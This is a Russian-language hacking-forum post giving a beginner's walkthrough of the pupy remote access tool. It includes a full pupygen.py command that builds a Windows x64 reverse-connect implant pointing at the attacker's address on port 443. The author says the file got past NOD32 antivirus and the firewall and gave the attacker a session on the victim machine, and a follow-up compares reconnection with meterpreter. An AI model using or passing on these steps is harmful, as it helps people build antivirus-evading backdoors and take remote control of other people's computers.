Инструмент периодически обновляется и является актуальным на сегодняшний день.
Пример компрометации для малоопытных пользователей:
В качастве атакующей систем kali linux 2017.1 с адресом 192.168.43.162
В качасве атакуемой системы win7 x64 c АВ NOD32.
Генерируем нагрузку:
Код:
Код:
./pupygen.py -f client -O windows -A x64 -o test_for_codeby.exe --randomize-hash connect --host 192.168.43.162:443
Получаем файл (test_for_codeby.exe) с заданными параметрами:
он находится в папке с pupy:
Доставляем файл на целевую систему, после чего из папку с pupy запускаем клиентскую часть:
Код:
Проверим файл NOD'ом c обновленными от 13.05.2017г. сигнатурами:
Как видим, всё ОК.
После запуска файла на целевой системе получаем сессию:
Список команд:
Наш процесс ID и разыв сессии:
Спасибо
~~DarkNode~~за обзор!!!
[doublepost=1497343964,1497343770][/doublepost]П.С. Мой пост к тому, что благодаря шифрованию и SSL ни брандмауэр ни АВ наш файл не заблокировали.
Минусом лично для меня является размер файла
[doublepost=1497347490][/doublepost]Еще добавлю.
В отличие от meterpreter, при разрыве сессии отсутствует необходимость повторной эксплуатации цели (в случае с pupy это повторный запуск вредоносного файла на целевой машине). Т.е. если процесс не был завершен, то достаточно повторно запустить листенер.